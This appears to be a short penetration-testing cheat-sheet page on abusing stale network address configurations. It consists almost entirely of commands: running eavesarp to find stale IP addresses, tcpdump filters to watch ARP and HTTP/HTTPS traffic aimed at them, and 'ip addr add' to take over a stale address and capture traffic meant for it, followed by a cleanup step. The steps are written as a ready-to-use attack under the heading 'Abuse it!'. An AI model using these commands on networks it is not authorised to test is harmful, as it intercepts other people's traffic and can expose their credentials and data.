SNACs Abuse
Stale Network Address Configuration
$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]# Check again with tcpdump
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"
# Abuse it!
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
Or
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
$ sudo ip addr add <STALE_IP>/24 dev eth0
# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0Last updated